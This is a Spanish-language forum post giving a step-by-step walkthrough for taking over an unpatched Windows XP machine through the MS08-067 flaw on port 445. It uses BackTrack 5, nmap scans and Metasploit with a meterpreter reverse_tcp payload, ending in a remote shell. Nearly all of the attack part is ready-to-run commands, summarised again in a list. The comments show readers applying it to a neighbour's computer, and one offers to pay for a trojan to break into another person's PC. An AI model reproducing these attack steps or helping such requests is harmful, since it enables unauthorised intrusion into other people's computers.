Hackear Windows XP por puerto 445 (ms08-067)

Hackear Windows XP por puerto 445 (ms08-067)









Que tal amigos, el siguiente Post lo hago con motivo solo de información no me responsabilizo por el uso que se le de a lo siguiente 

Como les comente en mi anterior Post en el cual les deje el Back Track 5 el cual lo usaremos para hackear nuestro equipo con Windows XP esto lo haremos atacando la vulnerabilidad MS08-067 por el puerto 445 La cual se hizo un poco famosa hace un par de años cuando Conficker infecto miles de equipos, a continuacion les explicare paso a paso como hacer esto... comenzamos!



Este laboratorio se realizo con BackTrack 5 y un equipo Windows XP SP3, aclaro tambien que el equipo con windows es un equipo sin ninguna actualización de windows y el Firewall esta desactivado




Lo primero que necesitamos saber es nuestra Ip por lo que abriremos una nueva terminal y escribiremos ifconfig



En mi caso mi IP es 192.168.254.39, una vez que sabemos esto tenemos que buscar en la red los equipos.

Para realizar un escaneo de los equipos que estan en nuestra red usaremos el comando 

nmap -sP 192.168.254.1-255 



En mi caso la red es 192.168.254 esto puede variar dependiendo de el segmento en el que se encuentren

Una vez que encontramos el equipo comenzaremos una busqueda para saber los puertos abiertos que tiene el SO.

Esto lo realizaremos con el comando 

nmap -sS -sV 192.168.254.44 (en mi caso la maquina que atacare tiene la IP 44)



Como podemos ver el puerto 445/tcp nos lo muestra como abierto (este sera el que atacaremos) una vez que tenemos esta información comenzaremos a utilizar el metasploit.

El  siguiente comando que utilizaremos sera 
msfconsole



Puede tardar un momento en mostrarnos la ventana de metasploit, así como la imagen puede variar a la que se muestra aquí.

Una vez que estamos en la consola de metasploit utilizaremos el comando

search windows/smb/ms


nos mostrara algo como lo siguiente



En la segunda imagen resalte el exploit que utilizaremos.

El siguiente comando que utilizaremos sera

use windows/smb/ms08_067_netapi

nos saldra algo parecido a esto



El siguiente comando sera

set payload windows/meterpreter/reverse_tcp

Nos mostrara algo así




El siguiente comando sera set rhost y la IP de la victima quedara algo así

set rhost 192.168.254.44

Después de esto pondremos el comando set lhost y nuestra IP, quedara algo así

set lhost 192.168.254.39



Después de esto sigue la prueba de fuego el ultimo comando

exploit

En caso de que todo funcione correctamente nos mostrara algo así



una vez que el exploit funciono correctamente podemos utilizar comandos como el de sysinfo para ver las propiedades del equipo



Y el mejor comando de todos 

shell


este comando nos dará acceso a la terminal de Windows  ya estamos dentro, lo demás depende de cada quien, en caso de que no sepan muchos comandos pueden utilizar help para que vean las opciones basicas 


Prácticamente los comandos que utilice son los siguientes

*ifconfig

*nmap -sP 192.168.254.1-255

*nmap -sS -sV 192.168.254.44

*msfconsole

*search windows/smb/sm

*use windows/smb/ms08_067_netapi

*set payload windows/meterpreter/reverse_tcp

*show options

*set rhost 192.168.254 (ip a atacar)

*set lhost 192.168.254. (nuestra ip)

*exploit


Espero y sus pruebas funcionen de forma excelente y no hagan mal uso de esta información XD les dejo un vídeo que encontré en el cual se realiza lo mismo que les acabo de poner


Hackear Windows XP por puerto 445 (ms08-067)
2 Puntos Score: 2/10
Visitas: 4461 Favoritos: 16
Ver los usuarios que votaron...
18 Comentarios Hackear Windows XP por puerto 445 (ms08-067)
sabes algun metodo efectivo similiar pero con contra win 7 ?
@eCCe para windows 7 solo lo he hecho con un backdoor tal vez despu?
Alguien sabe entrar al modem de Telmex/Claro ya que ellos no dejan accesar ala configuraci?
@pipe_84 los de telmex comunmente entras con la IP 192.168.1.254 el usuario es TELMEX y la contrase?
@conficker mm no men no me funciono pero gracias por contestar
Esta excelente este tutorial, perfectamente bien explicado, Muchas Gracias por tomarte tu tiempo y esfuerzo para compartir esto   Por cierto, una pregunta ?
@conficker vi algo de eso se hace un exploit creo , esperamos el tuto, gracias!!
@Dosu Gracias por los halagos   la verdad no lo he hecho ocultando mi IP deberias de probar y decirnos si funciona  
Brother tengo una duda.. con que os hiciste el hackeo??? xq en mi xp no admite ninguno de los comandos
@juguerer con BackTrack 5 lo puedes descargar de mi post anterior http://www.identi.li/?topic=176310#comment_1857505
Cita conficker: Mostrar
gracias brother  
Que no hagan mal uso ?  jaja...  
que tal master, mira necesito entrar a una pc no se q os tiene ni nada  lo unico q tengo es su correo, estuve viendo algo de spynet pero no puedo encryptar el archivo q quiero mandar , x eso te quiero preguntar si es q vos saves como puedo hacer. si tenes algun programita ya echo con  exploit  seria lo mejor. me decis cuanto $$ y arreglamos. mi correo es gastonsorgetti@ hotmail  com
gracias   amigooo ta interesante ! XD   saludos   +2
Le hice un escaneo al vecino y tieneee este puerto abierto, me parece que tiene win7, crees que funcione en ?
@Hardware No, windows 7 ya tiene parchada esa vulnerabilidad, por lo que no funcionara
Cita conficker: Mostrar
Okay :l haha gracias.
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!